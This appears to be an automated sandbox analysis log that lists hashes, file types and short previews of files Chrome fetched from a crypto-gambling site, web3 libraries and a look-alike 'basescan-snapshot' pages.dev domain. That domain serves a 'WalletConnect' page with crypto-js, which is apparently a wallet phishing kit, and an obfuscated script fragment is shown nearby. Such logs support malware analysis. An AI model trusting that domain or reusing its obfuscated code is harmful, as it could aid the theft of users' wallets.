                                                                                                                                                                                                                                              SSDEEP:6144:O/QrM70NNb2ki3aT9lWCNvmsIAAvkNS98bKwTlC1wr5ndZYTXLpg3jvLJvyzzWaO:OIrM7xkr/WamsIbcvbKunDYn6vU8
                                                                                                                                                                                                                                              MD5:4E131238273584C83B0089668CF50B1C
                                                                                                                                                                                                                                              SHA1:A0E353E006C1CE398CC28B065C9E2754F9F6D655
                                                                                                                                                                                                                                              SHA-256:8CDCD2AA68C68480D5180CA0CD64F190C7064FDECFF596EA34042EBA5FF181DB
                                                                                                                                                                                                                                              SHA-512:1179354C1AD3D530BE6A372BF1CF8C71584616FE31008FBC9BE57B4F83F04F731D600BF8EE3922AE57934D987C205B51BFDD19B4A3CE93FE09253194690F5DE9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js
                                                                                                                                                                                                                                              Preview:/*! For license information please see web3.min.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(self,(()=>(()=>{var e={1645:(e,t,r)=>{"use strict";var n=function(e){var t="function"==typeof Symbol&&Symbol.iterator,r=t&&e[t],n=0;if(r)return r.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},i=function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.chains=t._getInitializedChains=void 0;var o=i(r(7295)),a=i(r(1227)),s=i(r(439)),u=i(r(7098)),c=i(r(7687));function f(e){var t,r,i={1:"mainnet",3:"ropsten",4:"rinkeby",42:"kovan",5:"goerli"},f={mainnet:o.default,ropsten:a.default,rinkeby:s.default,kovan:u.default,goerli:c.default};if(e)t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 388 x 246, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):31790
                                                                                                                                                                                                                                              Entropy (8bit):7.88442978133124
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:mdOpkTms25D8/0gEy3JziCBT5rCBqH8nwPTvvWCIibjr6x:NyTWXgEyRBBJCcLPTWSjux
                                                                                                                                                                                                                                              MD5:54AC26E496D116E96B7E87878B2E2A84
                                                                                                                                                                                                                                              SHA1:07934DDD9FEECA7ADA2C7B7D24C4DB337999C301
                                                                                                                                                                                                                                              SHA-256:CA1C3DAFD14614C85700DDA9295736F8B880B100A2086D099566CBCD80FC01D2
                                                                                                                                                                                                                                              SHA-512:AD03082BFD7C487E79B3EB7834DA8BFF36284582B51952104216330BBD46A526771C1C46BF7772F8CDDFBFA1C548911FF65C9577333EE12A5ADDBB9FB984C7CF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................PLTE..r..g..i..j.y\..sceW..d..o..p..i>FFX_`Y[N..o..l..^{wZ..t8?@..r..q..p..f..r..m..o..e..k..r..m..m..n@MM<BE:<=;FF:AB;CD@DH9@@<CD9AA@DH:AB;CD:AB<CC:AC;AB9@B;CE9@A;BC:AB:BB:AA;BC:AB?CC:AA;AC9AB9AB;BC=BE:AA9@A<CC;BC:BB9@A;BD;CC9AB9AB:AB;AB:BB9@B<BC:@A:BC:AB:@A:AC9?@:BB:AA:BB:AB:AC:AB9?A:AB:AB:@B:AB:AA<DD..o..k..q..looa..p..g..h..j..q;GG9@A<AB;DD<AB=CC?FG:EG...CCC.........wxm............CEN...............ltu.........s{}.........fj`..m..r..c..k..o..b..q..q..r..i..l..h..................7??6=>6<=4:;4:;7?A=AD=DD>BEU]]...............x...................n..q@EE...\aZ.....o..m..b..f<BFqnW..rnkU=CD..................>FF.._..r..s..s..^..q..p..o`bV..m..r..d..p.z\..j..l[]N..d..g..ovrX..rzuZ..q..b..m..p..a..hXZM..jUXLjhT..l=DE7>@>CG..p..o...X..~....tRNS.kwt>.2[..z+BD.pa``cei,.IE.&.\mk...........!#$&')*,,./02345689:<>>?@ABCCEFGHJKLMNOPRSTUVXZ\^_`bceffyp.'.UQN...........o1."~....QB.N...Ex.....Ec.1...;KNV[Rg._[YVRNIGGFFg...>.7.L..4.;..y.7M.S:s....a/P...6...6..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (3423)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3424
                                                                                                                                                                                                                                              Entropy (8bit):5.340197407245798
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:ov/HAUoqFQG0z384fj1xWgXmtce4hguZaDRhk7t:onVIXznfkce4hgE6TkR
                                                                                                                                                                                                                                              MD5:195B6DF67B76CD0056185FC19507FB64
                                                                                                                                                                                                                                              SHA1:0FE913DAB7342930C70890881F783601CA44B26A
                                                                                                                                                                                                                                              SHA-256:DBC630CDCD02B59FB0D9568C426A14899D8ADBC195E06F61E22B28F3A9F7CA45
                                                                                                                                                                                                                                              SHA-512:9DA1D94C2605FBAD99F2A1246C20ED8C0FBDDE20E1436392FF885FA547DD794C5683B02F7AFD410BF2E1DB15FA08BE9EA91379B49B3638CFBB9961F86A116335
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/ThrowAndHighRolles-DADNM0eC.js
                                                                                                                                                                                                                                              Preview:import{a7 as C,bd as R,c as i,i as l,af as D,A,W as I,h as y,a9 as E,f as m,$ as P,g as q,be as H,bf as v,u as U,o as _,b as j,t as h,bg as B,l as x,s as k,r as w,p as f,q as J,D as L,e as z,m as F}from"./index-DD2Zk4iT.js";import{b as G,g as M}from"./index-DH9MDtxd.js";import"./_basePropertyOf-BhSQSS-6.js";const T={blackJack:G};var W=m('<div class="h-96 center">'),K=m('<div class="relative overflow-hidden px-2 text-secondary"><table class="table border-separate border-spacing-x-1 border-spacing-y-6"><tbody><tr><td class="w-[30%] lg:w-auto"></td><td></td><td class=w-16></td><td class=m-width>'),O=m('<img class="mr-1 inline-block w-5">'),Q=m("<span class=ellipsis>"),V=m('<tr><td class="w-[30%] lg:w-auto"></td><td class="text-primary ellipsis"></td><td class=w-16>x</td><td><div class="flex items-center justify-end"><span class="overflow-hidden text-nowrap"></span><img class="h-5 flex-none ml-1">'),X=m("<span class=text-second>");const p=10,[Y,S]=C({lastBet:[],highRoller:[]}),Z=R(()=>{con
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1494)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):11579
                                                                                                                                                                                                                                              Entropy (8bit):5.3724312991432255
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:IRmMcbYW73qw8LlL+z4Js6L8xL/J+zp/lnuALsY:Sct3qw85qz4Js6L8J/JOp/lnuA4Y
                                                                                                                                                                                                                                              MD5:04A2BC2AD268156F46D8FF2DB4531EA3
                                                                                                                                                                                                                                              SHA1:0B4B9BD3BBB200665D286C7CCEFB3232EC7400E7
                                                                                                                                                                                                                                              SHA-256:D6A9B3343810FE01C82C687D7E45094BBF1234654EA605C2555544CA936BC6C0
                                                                                                                                                                                                                                              SHA-512:9A7FC31FEC5611DF50303CB7A5F41E22D30E64C7BB56329F97CDE917B90CA552CDC19198AB812801303578845DB16ECAF6DFE28E698B2B9EA73AC1C344E89692
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/custom/combine-js-bottom2.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:var querystring=document.currentScript.src.substring(document.currentScript.src.indexOf("?"));var urlParams=new URLSearchParams(querystring);$.ajax({url:'/assets/js/custom/commonjs_token.js?'+urlParams,async:false,dataType:"script",cache:true,});var contentType="";var searchAddress=false;$(document).ready(function(){var showAd=[];var prepareAd=[];var intAdCount=availableAd.length;var d=new Date();if(intAdCount==4){if(d.getSeconds()>=45){showAd.push(availableAd[3]);}else if(d.getSeconds()>=30){showAd.push(availableAd[2]);}else if(d.getSeconds()>=15){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==3){if(d.getSeconds()>=40){showAd.push(availableAd[2]);}else if(d.getSeconds()>=20){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==2){if(d.getSeconds()>=30){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==1){showAd.push(availableAd[0]);}.if(showAd.length>0){prepareAd.push(gotAd[0]);}.if($
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):271815
                                                                                                                                                                                                                                              Entropy (8bit):5.327558274572759
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:SLaTmIQ+J4AHqBC2IWXfs4XogoYrH7ZTTpOYsAOA8G6TAB4l7N3jQ3BDG8G65yKp:SUQ+J4AKBCOfsW3H7ZTQnCbg72ifwsw7
                                                                                                                                                                                                                                              MD5:9DE3C76658BEEDEDA159A01498C6353C
                                                                                                                                                                                                                                              SHA1:94DC4B133E88421692C7115B8BE766AF066719B1
                                                                                                                                                                                                                                              SHA-256:2102A1367596149DBFCA660B8F823C48C87E4956F938EF8F7D6E15E6C9496C9B
                                                                                                                                                                                                                                              SHA-512:41CC0A8D24CBAA270181653B4C525A7BC911B81FD7775A21F60A4F42F0D34BCDB9E0E00D30CC3B45D9584B106022B06FC48FED14E680A58FA73573E098418A5D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(_0x610598){var _0x138797=(function(){var _0x4c01e2=!![];return function(_0x22933d,_0x3af5ad){var _0x5a5850=_0x4c01e2?function(){if(_0x3af5ad){var _0x287b9a=_0x3af5ad['apply'](_0x22933d,arguments);return _0x3af5ad=null,_0x287b9a;}}:function(){};return _0x4c01e2=![],_0x5a5850;};}()),_0x1c3625={};function _0x2127fd(_0x37b3ba){var _0x502a5c=_0x138797(this,function(){return _0x502a5c['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x502a5c)['search']('(((.+)+)+)+$');});_0x502a5c();if(_0x1c3625[_0x37b3ba])return _0x1c3625[_0x37b3ba]['exports'];var _0x1fde67=_0x1c3625[_0x37b3ba]={'i':_0x37b3ba,'l':!0x1,'exports':{}};return _0x610598[_0x37b3ba]['call'](_0x1fde67['exports'],_0x1fde67,_0x1fde67['exports'],_0x2127fd),_0x1fde67['l']=!0x0,_0x1fde67['exports'];}_0x2127fd['m']=_0x610598,_0x2127fd['c']=_0x1c3625,_0x2127fd['d']=function(_0x59a2f9,_0x391ef2,_0x16f37c){_0x2127fd['o'](_0x59a2f9,_0x391ef2)||Object['defineProperty'](_0x59a2f9,_0x391ef2,{'enumerable':!0x0,'get
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):18076
                                                                                                                                                                                                                                              Entropy (8bit):7.8940464015988
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:6YNg7/A8+3hw2AbdqdImCJ+DN5/y5VIoZeZnbDL+UuDKDdS:6YyP2AbdqfC0hmVI+ObDI40
                                                                                                                                                                                                                                              MD5:82438EC585013CD0F9D01BA71453F3B4
                                                                                                                                                                                                                                              SHA1:B7C712AF7D590B61BA40CEED638C990A74722DC4
                                                                                                                                                                                                                                              SHA-256:A9C720DF37157CB20D37733A0993E948B14303FC0D691D8DE9901EB4C2910E24
                                                                                                                                                                                                                                              SHA-512:F9186DE8ACA1C7044CCA2AF23C292EA97A1CEAF6ADD3747EE266CC7F79CFD7312592DDDA05455FB37A770B2B6E30655FD0E0103CC6F8F8F4C289ACEA88504AE8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/15935_Sugar%20rush%201000.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..9-...(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                              Entropy (8bit):4.575662329717722
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS+WFqX/+HwDRIvdBAe4VMO+DYQfDn:qO/+HwNIvdd4he7
                                                                                                                                                                                                                                              MD5:D7D3BA7413C70550623AE4CB99450F2C
                                                                                                                                                                                                                                              SHA1:10FF938BCBF05BB5EB24A6B83BC5B628E78BE453
                                                                                                                                                                                                                                              SHA-256:9AF43B0674CC50E9C747C545899C75F19D6986F47D60797F3677D2F7CD418BC4
                                                                                                                                                                                                                                              SHA-512:A05667D4E4D37F71B0CBD25C1AFCBFBA4E4C9116A8DBAA6E638E1964D45894038110D223CEDF5101E901EEE680544800E2BF00E40D8EA5BDF773D39A304DA618
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/remoteEntry.js
                                                                                                                                                                                                                                              Preview:import{O as f}from"./assets/manifest-aca455c4.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (324), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                              Entropy (8bit):4.388893582454915
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:huCPAorES326SfVVVVVVVVdJCSdmFoGm6SfVVVVVVVVmn:VAK7m6SrTJ6Sun
                                                                                                                                                                                                                                              MD5:D072FBF5A349DDBFC1098809B131DE8B
                                                                                                                                                                                                                                              SHA1:AB06C7FF71CBE0061FB114242D641C42473733C0
                                                                                                                                                                                                                                              SHA-256:443D745F2139A7C821D9BA3613D1E91452ECBE19CFE304B174901EDD81A2528B
                                                                                                                                                                                                                                              SHA-512:F1A0D233774A1E92E46B7EFC5731C3F2E9AB50F17D03CD12B7BBA39BD2724B778EC0D4F52C13856276EFA5A677906E4403070DA15A51CB1E06C91D2F6576CF58
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISZAn6jBIba2yPQxIFDRppjN8SBQ09H1M8EgUNWrHXEBIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SFwlliF59AADj3BIFDRppjN8SBQ09H1M8EhAJQQnSEmcErloSBQ1asdcQEk8J46cmNQVSPi0SBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_?alt=proto
                                                                                                                                                                                                                                              Preview:CnUKBw0aaYzfGgAKBw09H1M8GgAKBw1asdcQGgAKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKEgoHDRppjN8aAAoHDT0fUzwaAAoJCgcNWrHXEBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (769)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):770
                                                                                                                                                                                                                                              Entropy (8bit):5.046400169069175
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:8dUNp55JUQEZXFnk1w8KMdtoelN4kXXFL9goZUlI2oCu55gxvn:vkQYk1xBeklWI2oCuExvn
                                                                                                                                                                                                                                              MD5:1FF6BE43AC0EB1BDADEBCA43AD7D3CAF
                                                                                                                                                                                                                                              SHA1:86A819F86EA492C18D045C8C7CF3DD9251777EFD
                                                                                                                                                                                                                                              SHA-256:1C11D64D5490B073CFF2B2D2743D3B977F358BB07FC2EC936ACADA0DE343D570
                                                                                                                                                                                                                                              SHA-512:B0D9B36CD88DA5FB337D7BBD5E10AD748BF854E8FB4746538A5ED82733EBBA58F2772D4B5D7DCCF08D000E6825B8DECCF99DAABE8595197025A9AAFCEB75C058
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{i as a,c as r,r as s,Q as c,a6 as o,h as l,aO as m,l as i,f as h,t as f,m as d,e as u}from"./index-DD2Zk4iT.js";var x=h('<div><div class="flex items-center text-base font-extrabold text-primary">');function b(e){return(()=>{var t=x(),n=t.firstChild;return a(n,()=>e.title),a(t,r(l,{get when(){return e.href},get children(){return r(s,{get href(){return e.href},class:"ml-auto flex h-8 items-center rounded-lg px-2 font-extrabold bg-black_alpha5 dark:bg-layer5",get children(){return[c(()=>f("All")),r(o,{class:"rotate-180 text-secondary ml-1 size-4",name:"Arrow"})]}})}}),null),a(t,r(l,{get when(){return e.showController},get children(){return r(m,{class:"ml-2"})}}),null),i(()=>d(t,u("mt-4 flex h-8 items-center mb-1.5 sm:mt-6",e.class))),t})()}export{b as S};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1406 x 520, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):149327
                                                                                                                                                                                                                                              Entropy (8bit):7.938777576449798
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:YFDl/hAddOx7R2ABqObW/CzJKOCkvALbXc2O0ZZ/hsyt:YFDHAEMpO6gQOCkvALbXc2O0Jsyt
                                                                                                                                                                                                                                              MD5:AF1184CCD17BA8A16AAB38AB76462AC4
                                                                                                                                                                                                                                              SHA1:1A7A85839F99F1C7EBF0E638DC234369B943BB84
                                                                                                                                                                                                                                              SHA-256:48A68CD66E4B49D3BA50AA686C9ACBC6640FE74A1182ADA791BC7EEB4D9745D7
                                                                                                                                                                                                                                              SHA-512:F94223CBFABD434F46D4429BF3210ABC4E16C1EA3D4451D8C158294F474168FF01234C7EA7985D408E5D8315F0079101BF6C0A42EA03343E97A7AABCC4FA11E5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...~..........N......PLTE...7j8_fd..JPA...+.=.OK>?:1...]..)1+$' p.C....rD5...9.Sx.....&^.:b.J.n..... `.$.....7..[..`..E..>..V..N..9...'.R..?......A.5..;..M..G...M..4....g....!W..3.....H..B.....X5......E.1.. Q..0..'^*y..;.......O......$W.+#..6.(k..>."......};..![..-y..)g1p.*b.5-!.....v/j.o\ O..vd.......)`.C..$p..n8#..J.B2&.+p"d.+...H..}...C..2xK<+...gS.0o.^HS4"...>....9.E+....xS>..u. rW@4...YDb>(..l.{d..e.&NM......R.jF2.l\.cRtK3.|n.:~9w.rZ..{.ve9>![.lRE.+.`J>x\M.1..jR.4dk.. ..,....T.....D.}..G......!.G..aI.U.....C.IR3B.{7Q("E..Aq^..z..S6.j.t.."R..v.&^.YO-...6.T6z..6..4V:Y...3h`;P.or.E.NOdA...[..G....,.;$d$.....;....W....4V.m.....4.er......b.fGc.Ho.cr.,Lz...|nfzqKYwS.}x<=:p.zL..l^Z|......n.....Sc...\....OF8Cc...g..%tc...4.z.....\...@...}-.3......tRNS.. .A;.Ef...d..{s.u....a...Y....C.IDATx.....0..P_}......#e....J......!.tR.u.g....Y.8.@L{.b+]\.........w..).1.......V[.5}.....tq*~...u../..<w......k.........3.......n..&/~m
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):722
                                                                                                                                                                                                                                              Entropy (8bit):7.68848336343805
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:kPM35TWetLYcJIhgIJbuq8zHfQXAz61EcMbaIyoEyQALrzWLuTQ+Ek8riUx4bg:kEpqetLYceg0b98LkA8MWloEyQALWaT6
                                                                                                                                                                                                                                              MD5:EC017F7C52F33CCF544911EF5740A2B2
                                                                                                                                                                                                                                              SHA1:E8B825B27E5BDB12F95FE769551B1960CD5F2F1B
                                                                                                                                                                                                                                              SHA-256:1207179FF57006DD766BB68F9D9B25B5400DF01F53E9CF4D732075921EC663D5
                                                                                                                                                                                                                                              SHA-512:A7E3FF6B38C009340C8DF713CC009FCB4104B1A33A40E3724637C75DB49608B63CA56F207B9430E6333E740093195BC60CD2DCD7579745D903D696A78F297833
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/visa-CHvdFeKw.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../x....a.m........m...p....m$..O.....$A.Pgp.g..c.....p...6.y.@./."3a.T.V..0..@..0...m[m...Rz..ir..'..},.f....n.H...v.+......y,....../.y,H..].1.{.c.,L..~.4.Bq..C..dM0*.y,...P..5..DHl.b.Vj....Q..K..V..N.N..s*.6..(d..YU.+..Q.s.:....Nxel.^..&B..:.9.JJ..I(...}.....M...1...Q...N..B.9..VMO\k.t4.."..(.....OE;....Qs...r.96......9#8.A....V~...B>Z...-....mf...'D.....A....Vx..-?.}.\......x..|.;..h...kj..O2.`.!.D.lD.S...T....%.T.....4.{P........!.2P..Y...u....h...1...Y.dx.. 1..s..E.18..L..A.{k..B..rb...9r;.....l..]=.%.l.HA.FO4H0S.(...V.1qN..w....J".L..tJyK....b.J.'}F{+....e..-;...k'..(..B.......rB.....vf.P...._....%v%..j....M...I.$N..;...Ac...."..Bz.5.....6&...[...E./..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
